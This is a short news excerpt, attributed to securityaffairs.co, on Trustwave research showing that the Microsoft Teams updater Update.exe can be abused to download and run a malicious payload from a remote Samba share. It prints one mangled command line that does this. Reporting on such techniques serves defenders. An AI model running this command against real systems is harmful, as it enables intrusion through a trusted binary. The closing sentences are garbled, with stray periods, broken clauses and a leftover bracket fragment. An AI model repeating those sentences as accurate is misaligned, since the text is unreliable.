Security experts from Trustwave detailed the Living Off the Land technique that could allow a threat actor to abuse the MS Teams Updater to download any binary or malicious payload from a remote server. Experts set up a Samba server that allowed remote public access, the they were able to download the remote payload and run it from Microsoft Teams updater Update.Exe using the following command: Update.exe update=\remoteserverpayload folder. Attackers have to get the file inside the network in an open shared folders; Attackers. have access to the. payload from that share to the victim machine;”]
Source: https://securityaffairs.co/wordpress/106821/hacking/microsoft-teams-updater-malware.html

